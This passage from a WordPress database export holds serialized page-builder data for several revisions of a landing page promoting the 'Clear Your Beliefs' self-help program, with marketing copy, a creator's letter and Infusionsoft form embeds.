src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1187, 1668, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:729:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:952:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 46px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 64px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script><br /></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1189, 1671, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:649:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -12px; margin-bottom: -27px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. </p>\n<center style="margin-top: -10px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:952:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 46px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 64px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script><br /></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1188, 1670, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:729:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:952:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 46px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 64px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever 